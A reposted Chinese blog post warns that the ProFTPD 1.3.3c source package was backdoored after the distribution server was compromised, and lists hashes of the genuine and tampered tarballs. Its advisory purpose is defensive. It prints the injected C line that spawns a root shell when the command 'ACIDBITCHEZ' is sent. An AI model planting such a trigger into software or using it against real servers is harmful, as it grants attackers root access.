[转帖] 小心ProFTPD 1.3.3c源码被人插入后门

最新推荐文章于 2023-11-27 18:17:16 发布
最新推荐文章于 2023-11-27 18:17:16 发布
阅读量631 收藏
点赞数
文章标签: shell
原文链接:https://yq.aliyun.com/articles/527676
版权
http://www.exploit-db.com/exploits/15662/ 这里说到,rsync.proftpd.org 服务器存在一个漏洞,被黑客攻击得手,然后修改了官方提供用户下载的proftpd源码包,在代码中加入了后门!

注意看这里
  1. if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
     
  2. /* List the syntax for the given target command. */
     
  3. for (i = 0; i < help_list->nelts; i++) {
     
  4. if (strcasecmp(helps[i].cmd, target) == 0) {
复制代码
在hacker指定的特殊指令下,会向攻击者开启一个root权限的shell!!

所以建议大家把自己下载的proftpd安装包与官方的标准文件进行对比,以确保未被加入后门。
Original file:
Name: proftpd-1.3.3c.tar.bz2
Size: 4166609
MD5: 8571bd78874b557e98480ed48e2df1d2
SHA256: ea7f02e21f81e6ce79ebde8bbbd334bd269a039ac9137196a35309f791b24db1
Compromised file:
Name: proftpd-1.3.3c.tar.bz2
Size: 4203030
MD5: a43df54cc0b16c9e63a1045129d7b144
SHA256: d56d6d643534fe618b26807948b3cfe43c02b3f7abf7f4a073778c9c1666d1eb

 

本文转自holy2009 51CTO博客,原文链接:http://blog.51cto.com/holy2010/440283


weixin_34384681
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
proftpd-1.3.3.tar.gz
11-16
ubuntu ftp server 用于在UBUNTU 系统下搭建FTP服务,很好用!注意只能用地linux系统。
linux proftpd-1.3.4c安装配置实例
09-15
主要介绍了linux proftpd-1.3.4c安装配置实例,需要的朋友可以参考下
渗透实战靶机3wp
0nc3的博客
11-07 407
目标IP:xxxx.95测试IP:xxxx.96测试环境:win10、kali等测试时间:2021.7.23-2021.7.26测试人员:ruanruanwordpress后台getshell,在线编辑位置尝试错误对wordpress后台常见的getshell方法不够熟练,都尝试下从菜刀直接反弹shell到kali失败,显示/bin/sh,语法错误webshell不是完整的交互式shell,通过bash -c 'xxx’解决找marlinspike密码时没有直接尝试用户名。
funbox11靶机(ProFTPD1.3.3c提权漏洞)
m0_66299232的博客
11-13 471
3.上面俩个利用点都失败 ,前面探测到21端口proftpd有版本号。3.按照格式输出命令,成功进去root,轻松拿下!攻击机系统:kali linux 2021.1。1.用smbmap登录smb服务,查找利用信息。1.自己谷歌下版本漏洞可以找到利用的脚本。4.保存到当前目录,查看下,没啥大用。2.执行后发现usage,给出执行格式。2.用wpscan暴力破解用户名密码。2.用gobuster进行目录扫描。1.探测目标靶机开放端口和服务。虚拟机网络链接模式:桥接模式。ProFTPD1.3.3c提权漏洞
FTP服务proFTPD1.3.3C漏洞利用
qq_62272017的博客
06-22 464
FTP服务漏洞利用
ProFTPD-1.3.3c Backdoor Command Execution漏洞复现+poc
最新发布
开心星人的博客
11-27 780
https://blog.csdn.net/morrino/article/details/115836400 这个文章提供了一个部署1.3.3c版本的靶机。安装 https://blog.csdn.net/feelinghappy/article/details/106817434。https://www.exploit-db.com/exploits/15662 找到了存在后门的软件。在官网和官方github上找了一圈1.3.3c版本的proftpd,应该是漏洞太多,官方把下了。
FTP服务后门利用
qq_39687353的博客
04-11 938
FTP服务后门利用 1.什么是 FTP? 是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。 FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114) 至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。 2.searchsploit
开源FTP服务端工具proftpd源码
08-18
这是开源FTP服务端工具proftpd源码,最新版哪里去下载想必大家都知道,我只是源码的搬用工,赚点分花花,谢谢大家。
proftpd:ProFTPD源代码
01-30
ProFTPD 1.3.x自述文件 状态 介绍 ProFTPD是一个高度可配置的FTP守护程序,用于Unix和类似Unix的操作系统。 请参阅README.ports文件,以了解有关已知或认为在其上构建和运行ProFTPD的平台的更多详细信息。 ProFTPD...
靶机渗透练习32-Funbox11-Scriptkiddie
hirak0的博客
04-18 1130
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ Description As always, it’s a very easy box for beginners. Add to your /etc/hosts: funbox11 This works better with VirtualBox rather than VMware. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: I
proftpd 简介
04-08
 proftpd是一款开放源码ftp服务器软件,它是原来世界范围使用最广泛的wu-ftpd的改进版,它修正了wu-ftpd的许多缺陷,在许多方面进行了重大的改进,其中一个重要变化就是它学习了Apache 的配置方式,使proftpd的配置和管理更加简单易懂。本文将介绍它在Red hat Linux AS4 中最基本的安装和配置。
php拒绝服务漏洞,PHP ‘tidy_diagnose’函数拒绝服务漏洞
weixin_39678493的博客
04-08 256
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1[ PHP 5.3.8 Multiple vulnerabilities ]Author: Maksymilian ArciemowiczWebsite: http://cxsecurity.com/Date: 14.01.2012CVE:CVE-2011-4153 (zend_strndup)Original...
渗透测试---FTP服务后门
tzyyyyyy的博客
11-03 676
利用FTP服务后门漏洞 通过使用Metasploit框架进行渗透测试 并且取得root最高权限
proftpd-1.3.4c安装实例
dai451954706的专栏
07-11 1278
1.软件下载安装 [root@chenghy ~]# cd /root[root@chenghy ~]# wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.4c.tar.gz[root@chenghy ~]# tar zxvf proftpd-1.3.4c.tar.gz[root@chenghy ~]# cd proftpd-1.3.4c
6-20漏洞利用-proftpd测试
山兔的博客
07-28 666
ProFTPD一个Unix平台上或是类Unix平台上(如Linux,FreeBSD等)的FTP服务器程序http可以下载对应的版本,然后进行环境搭建。
给开源编译器插入后门
Man_OC的专栏
09-21 2964
原文地址:https://ring0.me/2014/11/insert-backdoor-into-compiler/ 说起 Ken Thompson,我们首先想到的是他发明的 UNIX 操作系统。他因此获得 1984 年的图灵奖。在图灵奖演讲上,Ken Thompson 提出了一个深刻的问题:看到了软件的源码,就意味着没有后门吗?编译器是否可能存在能自我复制的后门? 这
关闭 proftpd
05-30
要关闭 proftpd,可以使用以下命令: 1. 在系统中停止 proftpd 服务: ``` sudo service proftpd stop ``` 2. 禁止 proftpd 服务在系统启动时自动运行: ``` sudo update-rc.d -f proftpd remove ``` 3. 如果你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值